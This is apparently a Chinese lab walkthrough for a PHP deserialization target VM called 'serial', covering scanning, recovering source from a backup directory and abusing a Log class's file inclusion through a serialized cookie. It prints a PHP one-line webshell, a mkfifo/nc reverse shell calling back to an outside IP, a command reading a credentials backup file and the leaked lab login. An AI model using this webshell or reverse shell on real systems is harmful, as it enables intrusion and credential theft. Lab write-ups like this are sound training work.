反序列化靶机-serial攻略

1、打开虚拟机

2、扫描活跃的IP和端口

3、访问并查看页面源码

4、使用burpsuite解码,发现其为对象序列化的输出结果

5、扫描目录,找到隐藏目录/backup/

6、访问

7、下载bak.zip,解压发现3个php文件

8、查看代码,发现index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出

9、get shell

制作一句话木马

<?php system($_GET['cmd']);?>

10、构造payload

11、访问192.168.3.179/4.php,将回显的base64编码后序列化的输出结果复制

12、添加反弹shell:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f

13、反弹成功

14、cd /,然后ls

15、cat credentials.txt.bak

16、账号:sk4 密码:KywZmnPWW6tTbW5w

相关推荐
NewCarRen5 分钟前
符合网络安全的汽车OTA软件更新分发机制
安全·web安全·汽车
白帽程序员猫哥24 分钟前
漏洞全讲解之中间件与框架漏洞(数字基础设施的“阿喀琉斯之踵“)
网络·安全·web安全·中间件·密码学·渗透
AOwhisky1 小时前
云计算一阶段Ⅱ——12. SELinux 加固 Linux 安全
linux·安全·云计算
LH_R2 小时前
OneTerm 开源堡垒机 | 历时三个月重构大更新
运维·后端·安全
我科绝伦(Huanhuan Zhou)2 小时前
DM数据库的安全版本SYSDBA无法修改其他用户密码?
数据库·安全
Gobysec8 小时前
Goby 漏洞安全通告| NestJS DevTools /inspector/graph/interact 命令执行漏洞(CVE-2025-54782)
安全
是垚不是土14 小时前
JumpServer 堡垒机全流程搭建指南及常见问题解决方案
运维·安全·网络安全·github·系统安全·创业创新
AiTEN_Robotics15 小时前
工业环境中无人叉车安全标准深度解析
安全
厦门辰迈智慧科技有限公司15 小时前
水库安全“守护者”:智能雨水情监测预报系统
运维·网络·物联网·安全·监测
前端康师傅18 小时前
你还在相信前端加密吗?前端密码加密安全指南
前端·安全